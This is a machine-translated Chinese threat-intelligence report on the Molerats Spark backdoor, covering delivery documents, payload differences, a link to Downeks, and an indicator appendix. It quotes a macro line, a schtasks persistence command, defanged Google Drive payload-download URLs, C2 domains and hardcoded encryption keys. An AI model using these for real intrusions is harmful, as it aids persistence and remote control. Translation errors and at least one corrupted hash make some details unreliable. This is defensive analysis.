我们分析了2019年活动的交付文件,发现它是启用宏的Word文档(SHA256:40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11)。该宏通过将文档中的文本框设置为可见,并使用“ Shapes(“ textbox1”)。Visible = True ” 行来使诱饵内容可见,而本博客前面讨论的攻击并未尝试显示任何更新的诱饵内容。另一个明显的区别是,虽然2019年1月和2019年10月的交付文件都分别写入了辅助VBScript %userprofile%\ wmsetup.vbs和programdata \ Micorsoft \ Microsoft.vbs,但wmsetup.vbs脚本包含二进制有效载荷,而Microsoft.vbs尝试下载另一个将下载二进制有效载荷的VBScript。所述wmsetup.vbs脚本解码嵌入的base64编码有效载荷(SHA256:9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db
),将其保存到%temp%\ ihelp.exe,并通过运行以下命令来创建计划的持久性任务:
schtasks / create / f / sc分钟/ mo 1 / tn ihelp / tr%temp%\ ihelp.exe
2019年1月交付的Spark有效负载的一些显着特征包括使用与其他已知示例不同的免费可用库,例如使用msgpackv1库而不是JSON来构建其配置和C2通信,以及使用SFML库而不是cURL。此外,与2019年11月交付的Spark有效负载不同,此有效负载使用AES密码解密其配置和其他相关字符串,并加密和解密与其C2的网络通信。它使用提供的密钥字符串的整个SHA256哈希,而无需在密钥和密文上使用自定义滚动XOR密码,如本博客前面所述。使用msgpack构造的有效负载的解密配置如下所示:
\ x88 \ xa4jevG \ xadsmartweb9 [。] com \ xa3JRk \ xa1 / \ xa3ufRP \ xa4qNxp \ x00 \ xa4kfds \ xa0 \ xa4WjaS \ x01 \ xa3WnF \ xb8OMfx5GiCmOICUv = \\ a
我们还分析了2020年Spark活动的交付文件(SHA256:8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8),它与2019年1月和10月的交付文件有所不同。首先,初始交付文档不包含宏,而是尝试从Google云端硬盘加载远程模板,尤其是以下网址:
hxxps://drive.google.com/uc?export = download&d = 1NbCEnL-jA89PWBEhLWwHmBM5nmUKNRS8
远程模板(SHA256:a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367)包含一个宏,该宏试图从以下URL下载可执行文件:
hxxs://drive.google.com/uc?export = download&id = 1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH
在Google云端硬盘链接(SHA256:7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128)上托管的可执行文件是一个已编译的AutoIt脚本,该脚本尝试将Spark后门安装到%userprofile%\ runawy.exe,这与我们在“附件”中观察到的确切的dropper和有效负载相同。 “ .doc”交付文档,此博客前面已进行了讨论。
表6比较了本节中讨论的Spark负载中的功能。不幸的是,我们无法获得2019年10月攻击中传递的与MOFA相关的Word文档所安装的有效负载。如果我们将2019年1月和2020年交付文件中安装的Spark样本与2019年11月Pictures.pdf交付文件中安装的Spark样本进行比较,我们会看到明显的差异,表明该威胁组正在不断开发此后门程序。
| 特征 | 2019年1月Spark | 2019年11月Spark(Pictures.pdf) | 2019年10月和11月“ attachment.doc”和2020年1月“ The Spark Campaign” |
| 滴管 | 没有 | 编译的AutoIt脚本 | 编译的AutoIt脚本 |
| HTTP库 | SFML | cURL 7.56.0-DEV | 不一致的HTTPRequest |
| 配置结构 | msgpack版本1 | JSON for Modern C ++ v2.1.1 | JSON for Modern C ++ v3.7.0 |
| 有效载荷包装机 | 谜虚拟盒子 | 谜(5.X) | 谜(5.X) |
| 使用的密码 | 密文上的AES | 在密钥和密文上滚动XOR +在密文上滚动3DES | 对密钥和密文进行滚动XOR +自定义AES解密16字节的密文块 |
| 加密数据 | 配置,C2通讯的名称,收集系统信息的命令 | 配置,C2通讯的名称,收集系统信息的命令 | 配置,C2通讯的名称 |
| 坚持不懈 | 计划任务 | @StartupDir中的LNK快捷方式 | 计划任务,@ StartupDir中已复制的可执行文件 |
表6. 2019年1月,2019年10月,2019年11月和2020年1月交付的Spark负载的比较
与Downeks的连接
卡巴斯基的报告提到,Molerats子集团(又名加沙网络帮派)负责行动议会运动,该运动交付了Spark载荷,而我们观察到该威胁组在DustySky运动中交付了Downeks。从开发和安装的角度来看,我们观察到Spark和Downeks之间存在一些相似之处。
例如,我们观察到相同的活页夹特洛伊木马,它是一种用于打开诱饵文档并安装有效负载的恶意应用程序,其中一个安装了Downeks有效负载,另外两个安装了Spark。木马安装Downeks粘结剂在2015年12月被编译并在我们提到的DustySky竞选期间使用博客(SHA256:75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9),而我们有这两个样本粘结剂木马安装于去年11月编制2017年(SHA256火花样本:4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85)和2018年4月(SHA256:23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c)。
从开发角度来看,Downeks和Spark负载均使用GitHub上几个开源项目中的库和代码来进行C2通信并以JSON构造数据。首先,Spark使用cURL库进行C2通信,特别是7.56.0-DEV版本,其源代码可在GitHub上获得,而Downeks(SHA256:9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7)使用cURL与C2服务器进行通信,但使用的是早期版本(7.39.0) )。其次,有效负载使用JSON解析其配置并构造发送到C2服务器和从C2服务器发送的消息,它使用JSON用于GitHub上的 Modern C ++ Version 2.1.1 。。前面提到的Downeks还使用JSON解析其配置并构造从C2服务器发送和接收的数据。但是,它再次在GitHub上免费使用了腾讯的RapidJSON 。这与我们以前使用不同版本的Spark中使用不同的JSON库的Spark开发人员的观察结果相符。
结论
Molerats,也被称为加沙黑客团队和加沙网络犯罪团伙,在2019年10月至2019年12月初一直瞄准政府,电信,保险和零售行业六个不同国家的八个组织。该组织使用鱼叉式网络钓鱼电子邮件提供恶意的Word和PDF文档,并尝试对受害者进行社交工程设计使其感染,而不是尝试利用软件漏洞。同样,该小组在攻击中使用了Spark后门程序,但继续使用可免费使用的其他库来开发此工具,以构造重要数据并进行C2通信。
通过以下方式,Palo Alto Networks客户可以免受此博客中讨论的攻击的侵害:
- 所有已知的Spark负载和交付文档在WildFire中都有恶意判定
- 所有已知的Spark C2域和交付中使用的域在PANDB和DNS安全中都标记有恶意分类和判定
- AutoFocus客户可以使用以下标签跟踪交货文件和有效载荷:Molerats_Spark
附录
妥协指标
与MOFA文档相关的文件
d19104ef4f443e80c21375f1b779f00c960e0193e8aade69d7ad87a11f39c897 - MOFA- 031019.doc
dc3311b3a827840c25689c0e153f2c09ba9583bcf18cdc43b88b12cf9846e94b - Microsoft.vbs
c45b5b01e1c3284fd694db6aa0ebeab8abe78d9bb12eb41b957cd121d97b3516 - PlayerVLC.vbs
03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506 - MOFA- 061019.doc
725d907b33cca8cec22f561068a3a8abf3616a8e2f452adb7fbd4aec20390f06 - Microsoft.vbs
与Attachment.doc相关的文件
eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000
–attach.doc
7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 – rundll64.exe 64ea1f1eb2d79e79f43e79d79e43f79e43e79d43e7e43e79d3d
与Pictures.pdf相关的文件
9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495 - Pictures.pdf
1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da - Pictures.rar
92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7 - هذهعينةقليلةمنالصورEXE。
5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3 - pdf.exe
相关的Spark负载和交付文档
ee9f90819a578c8256fc950f62bd9f7b051edbee06618a26fa21c2875c3c301e –المذكرةرقم973قائمةالحكومةالج(注解973号政府清单c)
9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7 – GoogleChrome.vbs
ddf938508618ffff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8 – MOFA- 101019.doc
4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba – Microsoft.vbs
Feec28c7c19a8d0ebdca8fcfcc0415ae79ef08362bd72304a99eeea55c8871e21 –巴勒斯坦发展报告–最重要的是9月9日– 2019年9月9日-巴勒斯坦报告(9月9日)。
bf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959 –التقريراليوميحولأخرمستجداتالإرهابالعالمي-9 – 9 – 2019.doc最新9日报道(每日更新),日期为每天9天。
243f1301d1d759c17cd49336512ebceb9d347995c90a6e00aff926439d63f12d – Daily Report.rar
602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb
eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000
273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f
71ea0ba573451b14bb411ad28e5aac883f8af0376db8c9d34f309778c901c5d6
a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367
8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8
7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128
64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431
e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614
6e60f5c65299ee7f7b257f5c83d3bb36154654b26e721136f7184514fcf6b296
b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca
a6e0297777ba29e21e5d1acca6210d436eee5c2b93d2dec27910ffd6e2266559
6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47
cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551
92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7
5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3
89acce7cdd354a04f2edd4a2226caf5c47246a8196ec1d9b98159da38ec20c24
b654dd768912e09b9c71eb388995b1d69b5baa45e970a6afc42733d647220712
daa72ba2b9525d74e0a3564d0d72e06eed27d04ce63fe98c45b1e84cee09987c
c39e3adb6e15b9964bf0f9702b632086951b4ed9f9fb9cadd6975962a031a398
255a29f88150285a9553f67a6475dc50fcbb5fc737a0178cc0e737d49c8d1b20
4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85
23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c
75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9
9a3ec0a8b2a88106fc537d9cae1989f6fba36bb43352a944d2031e7b2ab7673c
89d7337ac102cd80316ad59a1dcfcc5c7849d0e7520f0f85e1781574423e38ea
19ede61c865a3cdd59d3a5d1a79b7ce83ca7828a6b80a2f968d82b5b56a8603c
f9df76f634586c698b967209d83834b98ff3d245d47d6993bfb27a0aa819d9b9
704b19e0460a0fa7d952ba6feb5eadb9054895d1d753df72faf6f470446a0519
194c236a3eed81f3180bdcc5bcbd29b782b1a0ef7962ceb1c4cb892a427563ff
fc420a49b1e9e2200238a4846110c2e4e63bfe6d7088645f49ebb65718a70b7f
bc9353adc58b983b080b61950fc6689ee340797458fc4fd8a1d6f492976aa0e2
8c6dc796b35ef405c42c78e1011cc4a6df09315264d638271cb0674d044886cf
9d49020debdc6ab63de249fd9289d51415395fc8b1e8a15a82f200bf90e674ee
5b6e43d434148bfcf52fd441f64836ae35f4f0ed9d75bf9707f521bcbb7c0380
3a32c81ec609a5466f050c09156f25b5561c691763f865ee437e95a246dcbbe1
c3e23a42dc49b039828da6cef4ebb7226c85163651a69085ee7e1899aa804fed
26b032a9b6a22047eb48f1fb1553827a5b85aa7229422d650fa1f37c48b3aeb1
8e5bf597948ea6ad39f0030053978d1a14e1c3dbb4abf044a223e14544c73b7f
1513032544512718d068b2f6e8b5087cae9fc446e40cd56c03ab7bbbe047add5
d04276760d722c241e831dacee7cf9d63cb123ce7188d604df1c56c1197d7160
83750372d4e8c043d6f916ec398303dc929b59e05b7f5a9dc5485e4530047f4a
23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c
bf4cdb277881754db2f44a014c08ce1857c9c0c47c6c1c8582782b5c887241e2
58376e763ef0ca9dccad55e043794b5ec0b34c8c2a20604cff0b26f216e3c1e2
399344aa609f17e558356709a398b4478e5c737c7cc843e3d111d33192c35e5a
1c43f8f68f7b8e40828f9f74566860b25a5dfd9b7f8b7620d71644866e6cb19d
ab2335ba3abe97a02a3a2d1b063a08ae649406f88d4cf02d22d724e649b9e7be
a4c6aea61953d515d38d75ae7b3ef2a37bb26d1f838722f0a67624d6a728549e
51c1e6ce3ff1f42734bfa19a7142b5154172232afc5528dad4c527df3a44c0c1
329e9e98f08f3d6a017254dd033984cfd6421ccab5b323ebace5d68662a98a09
0631ed0995e21ec8f02f6167824eca92e84abfd8cf4dbbd9c7c88f88d4f570cd
d010ef2b6664779b3c8cfa0a5179b7331d88d34d04350ebeeecb3bae65654393
4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85
51042cac30b4d6072f79b3f9b27d8ee7b65f438549c90f57dc5fecc17d35054a
ec0d30d2fdd301bf0cfe66028c9a37d5535a8161909d0d3573447d1843f61c97
e6e5593cbac23ec5c51e5f63c4c6616a8eb71697a89f9d1d17cc7be91c36e3e9
36166db096ddb50af4f5c4be48b4274c535f40c74ce3450d4ad3bdaa2c28beb3
966ad6452793b1562f0081456a951d3310d4e7690fa74ef8ff4046778bd37168
b2437a54195d51435ad07867a5cb069e831fdd8e48bb70daa3894fde40754bc8
fe19ab4fd65531163d197d565201c2afea7d9f8e74e5f75c714eb5fe086a02fd
212aa6e3f236550bb4b9328071ee4f0e8a74465c75dcf1e6cde8502afde91364
e489e5297ed8cf594c2a5160eff79b12b9ee68e36e0d00ed31f44b75c4a38f61
0eebc31bb64ba0aa0ea335a5f35392ff1d058e97bf5cb5b46d7a89b197dcba7a
fe0f23d6675260dd40f277906aa3dd34cbef2243336334dda10ad4500f8e6883
7c5a9ce04002be953c556b5b50c10f8d462abc92d1ffe28a325d7ea741701be1
45a2c50edd710476e0de8ece6cc5931035ce8183ac4cf521d494d94744d44c2c
b84f2497e4cfeac240b1815b22741609e5a31f0be11667a3c7256c16788728ec
78696cf4370817cb0ffd6930a92553d3551fe77cdc6d45638ddd13f05b9218b8
5109f2c8f014698f1d2f0d59a7c9cc1cd9400a6fe4dcde95cc475f453e74bc6e
ab4e43b4e526d44bf12ae5113184afdf5c15630808f674f5e1a472eb6811ce3f
daa72ba2b9525d74e0a3564d0d72e06eed27d04ce63fe98c45b1e84cee09987c
64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431
6e60f5c65299ee7f7b257f5c83d3bb36154654b26e721136f7184514fcf6b296
B08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca
cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551
9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db
e3779f6252ca606ace9ae06623ba086d1a441582b625e433799260d71cdb1b4b
e6e9f7b0449976537d9276192e5767c9909cd34df028a8bf1cac3dbe490f0e73
69df8e4bdc3fd69deb6c866254f80f6288549222ed0d07ccd4c05597e75414df
40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11
相关交付域
servicebios [。] com
dapoerwedding [。] com
zmartco [。] com
Spark C2域
webtutorialz [。] com
nysura [。] com
laceibagrafica [。] com
motoqu [。] com
smartweb9 [。] com
laptower [。] com
app.msexchanges16 [。] com
msexchange13 [。] com
cloudserviceapi [。]在线
updates.masterservices [。]在线
client.itresolver [。]在线
update.itresolver [。]在线
91.219.237 [。] 99
goldenlines [。]网站
Update.nextdata [。]网站
Spark名字和更多
| 解密的字符串 | 用法 | 描述 |
| 劳伦斯 | C2频道(来自有效负载) | 字典(JaseN)中的关键字名称,用于存储象牙字段中提供的任务编号的值 |
| 艾里尔 | C2频道(来自C2) | 密钥名称用于存储未知用途的数字,但应作为对MorganE通信类型的响应。 |
| 杰森 | C2频道(来自有效负载) | MorganE通信类型的词典列表的键名,表示接收到的任务号 |
| 象牙 | C2频道(来自C2) | Jordanlzw列表中的密钥名称用于存储我们认为是任务编号的数字 |
| 乔纳斯 | C2频道(来自C2) | Jordanlzw列表中的键名用于存储布尔值(原因未知) |
| 统治力 | C2频道(来自C2) | Jordanlzw列表中的键名用于存储布尔值而不创建进程,而只是将“ ok”发送回C2 |
| 杜鲁门 | C2频道(来自C2) | Jordanlzw列表中的键名,用于存储命令行参数以与可执行文件一起运行 |
| 阿拉尼 | C2频道(来自C2) | Jordanlzw列表中的密钥名称,用于存储要运行的可执行文件 |
| Averizt | C2频道(来自有效负载) | 密钥名称,用于存储VanessaFM通信类型中的数字,该数字在二进制文件中进行了硬编码。 |
| 恩·马蒂亚斯 | C2频道(来自有效负载) | VanessaFM通讯类型的词典列表的键名 |
| BrandentlK | C2频道(来自有效负载) | 密钥名称,用于存储VanessaFM通信类型中的数字,该数字被硬编码到配置中。 |
| 阿达林 | C2频道(来自有效负载) | 字典中的键名(MathiasNbo)用于存储目的不明的数字。 |
| AdelineRD | C2频道(来自有效负载) | 密钥名称,用于存储从VanessaFM通信类型发送到C2的有效负载配置获得的base64编码的加密字符串。被视为昵称或广告系列/有效载荷标识符。 |
| 科林斯 | C2频道(来自有效负载) | 字典中的键名(MathiasNbo)用于存储UUID,该键名也出现在ZaydenlnL字段中 |
| 内娃 | C2频道(来自有效负载) | 字典中的键名(MathiasNbo)用于存储目的不明的布尔值。 |
| 伦敦 | C2频道(来自C2) | Jordanlzw列表中的键名用于存储布尔值以创建指定的进程并等待返回 |
| 乔斯林克 | C2频道(来自有效负载) | ReeceWNM字段中的值代表系统信息的传输 |
| 天使 | C2频道(来自有效负载) | 系统信息词典(Maximiliano)中用于存储信息类型值的键名(1 = UUID,2 =主机名,3 =用户名) |
| ZaydenlnL | C2频道(来自有效负载) | 系统信息词典(Maximiliano)中使用的键名称,用于存储与AngelxEv中指定的类型相关联的数据 |
| 休斯顿 | C2频道(来自有效负载) | 系统信息字典(Maximiliano)中使用的键名,用于存储目的未知的值“ 1” |
| 马克西米利亚诺 | C2频道(来自有效负载) | JoslynKe通信类型中的密钥名称,用于存储系统信息词典的列表 |
| 驻军 | C2频道(来自C2) | 有效载荷使用的数字值的键名,可能在发送其他命令的结果之前用作睡眠间隔。 |
| 策克 | C2频道(来自有效负载) | Winston通信类型的词典列表的键名 |
| 里斯夫 | C2频道(来自有效负载) | Zeke数组中词典中用于表示任务编号的键名 |
| 弗雷德里克 | C2频道(来自有效负载) | Zeke数组中的字典中的键名,用于存储任务的已执行命令的结果 |
| 凯莉·徐 | C2频道(来自有效负载) | 如果执行成功,则Zeke数组中存储布尔值的字典中的键名 |
| 永远 | C2频道(来自C2) | 有效负载用于空闲指定秒数的数字值的键名 |
| 卡丽 | C2频道(来自有效负载) | 发送到C2的JSON字段,用于存储通信数据 |
| ReeceWNM | C2频道(来自有效负载) | 发送到C2的JSON字段,用于存储通信类型 |
| 摩根 | C2频道(来自有效负载) | ReeceWNM字段中的值代表任务编号,该任务编号将发送有关 |
| 温斯顿 | C2频道(来自有效负载) | ReeceWNM字段中的值,表示命令执行结果的传输 |
| 杰西卡 | C2频道(来自有效负载) | ReeceWNM字段中的值表示信标 |
| VanessaFM | C2频道(来自有效负载) | ReeceWNM字段中的值,表示对其他任务的请求 |
| rEA8GPZf4oIdOsjMxgFD | 键 | 用于加密发送到C2的JSON中的字段,包括收集的系统信息 |
| 约旦 | C2频道(来自C2) | 存储要运行的命令的词典列表的键名 |
| 阿里亚纳 | C2频道(来自C2) | 数字值的键名,用于指定存储在Jordanlzw列表中的要运行的命令数 |
| 24 | 设定档 | 发送到C2的消息之间的最小睡眠间隔 |
| 119 | 设定档 | 失败的C2信标之间的最小睡眠间隔 |
| JvFLb8pHNywoGdhtjsc5 | 键 | 用于加密C2通信 |
Spark昵称/广告活动代码
| SHA256 | 编译时间 | 昵称 |
| 0631ed0995e21ec .. | 2017-03-27 2:46:06 | 28-10 |
| 966ad6452793b15 .. | 2017-05-24 6:15:04 | 昵称 |
| 212aa6e3f236550 .. | 2017-05-24 6:15:04 | 昵称 |
| ab4e43b4e526d44 .. | 2017-05-24 6:15:04 | 昵称 |
| 36166db096ddb50 .. | 2017-10-07 7:06:22 | bbb |
| d010ef2b6664779 .. | 2017-10-07 7:06:23 | 28-10 |
| 194c236a3eed81f .. | 2017-10-22 7:03:45 | sss |
| fc420a49b1e9e22 .. | 2017-10-22 7:03:45 | sss |
| bc9353adc58b983 .. | 2017-10-22 7:03:45 | sss |
| 9d49020debdc6ab .. | 2017-10-22 7:03:45 | 昵称 |
| 3a32c81ec609a54 .. | 2017-10-22 7:03:45 | 3007 |
| c3e23a42dc49b03 .. | 2017-10-22 7:03:45 | 50852 |
| 8e5bf597948ea6a .. | 2017-10-22 7:03:45 | Ø |
| 151303254451271 .. | 2017-10-22 7:03:45 | 昵称 |
| 83750372d4e8c04 .. | 2017-10-22 7:03:45 | 0204 |
| 58376e763ef0ca9 .. | 2017-10-22 7:03:45 | [R |
| 1c43f8f68f7b8e4 .. | 2017-10-22 7:03:45 | ood |
| ab2335ba3abe97a .. | 2017-10-22 7:03:45 | 昵称 |
| a4c6aea61953d51 .. | 2017-10-22 7:03:45 | 昵称 |
| 329e9e98f08f3d6 .. | 2017-10-22 7:03:45 | 富达 |
| 78696cf4370817c .. | 2017-10-22 7:03:45 | 本 |
| ec0d30d2fdd301b .. | 2017-10-28 10:55:21 | 28-10 |
| 9511940ed52775a .. | 2017-12-02 11:16:24 | <空白> |
| 5139a334d5629c5 .. | 2019-09-16 10:00:45 | 博客 |
| 89acce7cdd354a0 .. | 2019-09-16 10:00:45 | Docx |
| b654dd768912e09 .. | 2019-09-16 10:00:45 | 2909 |
| daa72ba2b9525d7 .. | 2019-09-16 10:00:45 | PalCamp |
| 69df8e4bdc3fd69 .. | 2019-09-16 10:00:45 | 新闻Mac |
| cf32479ed30ae95 .. | 2019-12-30 9:45:44 | 1401 |
| 64ea1f1e0352f3d .. | 2020-01-12 10:57:50 | FS1-2020 |
| 6e60f5c65299ee7 .. | 2020-01-12 10:57:50 | 1801 |
| b08b8fddb9dd940 .. | 2020-01-12 10:57:50 | FS1-2020 |
| 04fa6aaea5e3a26 .. | 2020-01-12 10:57:50 | 上 |
未经允许不得转载:x-sec » Molerats针对政府和电信组织展开网络钓鱼攻击
